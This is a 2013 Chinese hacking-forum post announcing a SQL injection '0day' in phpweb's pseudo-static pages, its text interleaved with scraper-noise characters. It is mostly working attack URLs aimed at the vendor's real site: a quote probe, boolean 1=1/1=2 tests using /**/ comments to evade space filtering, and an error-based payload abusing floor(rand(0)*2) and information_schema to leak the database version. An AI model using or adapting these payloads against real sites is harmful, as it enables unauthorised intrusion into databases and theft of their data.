找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2267|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入
8 R' i& ^* v  j% b- {$ N( a4 Q0 D
: L0 r( g$ y9 v) q9 g- G1 _0 r8 B主站:http://phpweb.net/" c; R8 U* f6 [' e' C8 m1 D
加’检测:% w( T* h% n1 f! }3 n+ J* k' d
- B$ ^: ~2 T9 a- |; I3 B2 a& B6 q
http://www.phpweb.net/down/html/?772′.html  P% N) O  M7 F4 H% Q
6 k5 q+ B* T) D5 k, B* w/ _" M% y
出错" e- k8 C. `$ y3 x
存在注入。8 G  `- I; {4 _" w8 H( d
不能用空格,只能用/*罗) U, i: c' \4 U" [/ b$ h7 N
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常8 V3 R; E( m8 @" P* S

+ k5 p4 k% q* `8 u. b7 Phttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.+ H8 x' A3 Y- U  H0 R
爆数据库版本:
: N; o1 N& Q! d   K. V  S; w% A- V5 r
?4 m4 w: Q6 a. a( n/ q, w
1
# a/ y4 h$ z7 W! C2 xhttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html% b( W! F5 z( _- Y+ o" Z3 I
更新日期: 2013-01-03 13:39:50        
% f3 i/ \7 _+ x2 p- w, L" Q2 C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表